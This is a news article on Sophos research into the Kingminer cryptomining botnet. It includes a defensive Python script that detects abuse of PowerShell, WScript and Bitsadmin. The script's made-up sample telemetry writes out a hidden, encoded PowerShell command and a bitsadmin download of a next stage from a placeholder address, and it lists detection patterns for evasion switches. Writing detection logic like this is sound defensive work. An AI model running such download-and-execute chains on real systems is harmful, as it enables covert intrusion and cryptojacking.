Kingminer botnet combines sophisticated techniques alongside cut-and-paste & legitimate tools

News by Andrew McCorkell

In-depth research from Sophos into the Kingminer botnet shows that cybercriminals are using a combination of sophisticated techniques and copy-paste tactics, along with legitimate tools.

The Kingminer attackers are using legitimate tools such as PowerShell, WScript and Bitsadmin. Against attacks built from abused legitimate components, being able to query how those tools are used, and how they interact with each other, has become a necessary defensive technique.

Sophos' State of Ransomware 2020 report shows that almost a quarter of organisations breached by ransomware attacks were able to detect the intrusion and stop it before their data was encrypted.

Paul Ducklin, principal research scientist at Sophos, commented on illicit cryptomining: “The Kingminer attackers aren't really concerned with innovation but with adaptation, meaning that they take existing malicious techniques and tools and tweak them or combine them to blend in for as long as possible.

“Illicit cryptomining follows a simple underlying equation: the longer the criminals go unnoticed, the longer they mine, and thus the more money they make. Unlike a ransomware attack, which involves careful preparation followed by an assault you can't fail to notice, criminal cryptomining is about being an unseen, electricity-eating parasite for as long as you can.”

Sophos' in-depth research into the opportunistic Kingminer botnet shows:

  • Cybercriminals are using a combination of sophisticated techniques and copy-paste tactics
  • Attackers are relying more on legitimate tools such as PowerShell, WScript and Bitsadmin to live off the land, so being able to query how legitimate tools are used and how they interact with each other is a necessary defensive technique against attacks built on abusing legitimate components
  • Kingminer shares many of the attributes of advanced ransomware attacks. In the State of Ransomware 2020 report, almost a quarter (24 percent) of organisations breached by ransomware attacks were able to detect the intrusion and stop it before their files were encrypted.
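The point made in the bullets above and earlier on the page, that defenders must be able to query how legitimate tools are used and how they interact, is easiest to see as process-lineage logic: the individual binaries are legitimate, the chain is not. The following is an added example written for this article, not Sophos code and not a description of Sophos EDR's own rules. The event records, PIDs, paths, base64 string and the 198.51.100.7 address are constructed, and the rule names are invented for illustration.

```python
"""Flag suspicious chains of legitimate Windows tools in process-creation telemetry.

Illustrative detection logic written for this article, not Sophos code. The records
below are constructed to mimic the fields a process-creation event carries (Sysmon
Event ID 1 or Security 4688: pid, ppid, image, command line, user).
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# PowerShell switches that hide or obfuscate a payload. PowerShell accepts any
# unambiguous abbreviation, so the common short forms are listed explicitly.
PS_EVASION = re.compile(
    r"(?i)\s-(?:e|en|enc|encodedcommand|nop|noprofile|"
    r"ep\s+bypass|executionpolicy\s+bypass|w\s+hidden|windowstyle\s+hidden)\b"
)
URL = re.compile(r"(?i)\bhttps?://\S+")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path as logged
    cmdline: str
    user: str


@dataclass(frozen=True)
class Alert:
    rule: str
    pid: int
    chain: str      # oldest known ancestor first, e.g. "wscript.exe > powershell.exe"
    cmdline: str


def image_name(image):
    """Lower-cased file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()


def lineage(pid, by_pid, max_depth=8):
    """Image names from the process up through its known ancestors.

    Stops at an unknown parent, a cycle (PIDs get reused), or max_depth.
    """
    chain, seen = [], set()
    while pid in by_pid and pid not in seen and len(chain) < max_depth:
        seen.add(pid)
        chain.append(image_name(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


def detect(events):
    """Return Alerts for living-off-the-land chains built from PowerShell, WSH and BITS."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        name = image_name(ev.image)
        chain = lineage(ev.pid, by_pid)
        ancestors = chain[1:]
        rendered = " > ".join(reversed(chain))
        if name in POWERSHELL:
            # A script host handing off to PowerShell is exactly the tool interaction
            # the article says defenders need to be able to query.
            if ancestors and ancestors[0] in SCRIPT_HOSTS:
                alerts.append(Alert("script_host_spawns_powershell", ev.pid, rendered, ev.cmdline))
            if PS_EVASION.search(ev.cmdline):
                alerts.append(Alert("powershell_evasion_flags", ev.pid, rendered, ev.cmdline))
        elif name == "bitsadmin.exe":
            # A BITS download on its own is normal (Windows Update uses BITS); one
            # launched beneath a script host or PowerShell is the suspicious chain.
            is_download = "/transfer" in ev.cmdline.lower() and URL.search(ev.cmdline)
            if is_download and any(a in SCRIPT_HOSTS or a in POWERSHELL for a in ancestors):
                alerts.append(Alert("bitsadmin_download_from_script_chain", ev.pid, rendered, ev.cmdline))
    return alerts


# Constructed sample telemetry, not from a real incident. PIDs, paths, the TEST-NET
# address 198.51.100.7 and the base64 placeholder are all made up.
SAMPLE_EVENTS = [
    ProcEvent(400, 1, r"C:\Windows\System32\services.exe", "services.exe", "SYSTEM"),
    ProcEvent(812, 400, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p -s Schedule", "SYSTEM"),
    # A scheduled task runs a script through Windows Script Host ...
    ProcEvent(2210, 812, r"C:\Windows\System32\wscript.exe", r"wscript.exe //B //Nologo C:\Users\Public\kb.js", "SYSTEM"),
    # ... which launches hidden, profile-less PowerShell with an encoded command ...
    ProcEvent(2244, 2210, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA", "SYSTEM"),
    # ... which fetches the next stage with BITS rather than its own web cmdlets.
    ProcEvent(2260, 2244, r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer upd /download /priority high http://198.51.100.7/u.txt C:\Windows\Temp\u.txt", "SYSTEM"),
    # Benign contrast: an administrator at an interactive desktop uses the same tools.
    ProcEvent(3100, 1, r"C:\Windows\explorer.exe", "explorer.exe", r"CORP\admin"),
    ProcEvent(3120, 3100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe Get-Service BITS", r"CORP\admin"),
    ProcEvent(3140, 3100, r"C:\Windows\System32\cmd.exe", "cmd.exe", r"CORP\admin"),
    ProcEvent(3150, 3140, r"C:\Windows\System32\bitsadmin.exe", "bitsadmin /list /allusers", r"CORP\admin"),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] pid={a.pid} chain={a.chain}\n    {a.cmdline}")
```

Run against the sample, the malicious chain produces three alerts (script host spawning PowerShell, PowerShell evasion switches, and a BITS download underneath that chain) while the administrator's interactive use of the same three binaries produces none. The lineage walk is what distinguishes the two: none of the three binaries is suspicious on its own, and a product-grade rule set would still need tuning for legitimate automation that chains them.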

Sophos has announced an updated version of its Endpoint Detection and Response (EDR), which it describes as 'the most significant product upgrade ever done by Sophos.'

Sophos’ EDR now includes new Live Discover and Response capabilities to quickly identify and neutralise evasive threats and proactively maintain IT operations, as well as allowing organisations to search for past and current indicators of compromise.

Ryan Miller, chief information security officer at Mission Search, said: “Sophos EDR is a force multiplier that gives me the tools I need to do the job of an entire team without adding additional headcount.

“This new version drastically reduces the time it takes to detect and respond to incidents, saving me on average four to five hours per day. Easy-to-use SQL queries simplify the previously complex and time-intensive process of investigating suspicious activity, and allow me to perform searches that are completely unique to my network.

“As the chief information security officer of a Joint Commission certified healthcare staffing firm, I am extremely sensitive to any time delays in receiving warnings related to suspicious activity that could be a precursor of a malicious attack designed to obtain sensitive data.”

Gabor Szappanos, threat research director at Sophos, said the world of cybercriminals is a "heterogeneous mass" with many different levels of competence and resources among them. Understanding these varying capabilities is important when preparing defensive actions.

Szappanos added that the operators of the Kingminer botnet are ambitious and capable, but don’t have endless resources – they use any solution and concept that is freely available, from public domain tools to the techniques used by advanced persistent threat groups.

He said: “This is a classic example of a lower-rung cybergang unit copying an APT-style attack - in this case, a Chinese APT attack method - and using it as a blueprint for Kingminer. Sophos has talked about how some cybercriminals use other attacks as blueprints, and this is evidence that the trend is continuing, if not becoming more persistent, because it is cost-effective and proven.

“Many parts of the Kingminer attack are orchestrated using legit or greyware applications and PowerShell scripts. For defenders, this is where application control and other EDR features that detect suspicious ‘Living off the Land’ activity, as well as AMSI detections, can play a huge role.”

Sophos published its new research, An Insider View into the Increasingly Complex Kingminer Botnet, showing how servers are used to carry out attacks and the importance of threat intelligence in detecting such activity.

Sophos found that Kingminer tries to gain access to servers by brute-forcing login credentials and, among other attack mechanisms, uses the EternalBlue exploit (the SMBv1 vulnerability patched by MS17-010 in 2017) to spread its malware.

Dan Schiappa, chief product officer at Sophos, said that cybercriminals are raising the stakes, stopping at nothing to capitalise on expanded attack surfaces as organisations increasingly move to the cloud and enable remote workforces.

Schiappa said: “Servers and other endpoints are all too insufficiently protected, creating vulnerable entry points that are ripe for attackers to exploit."
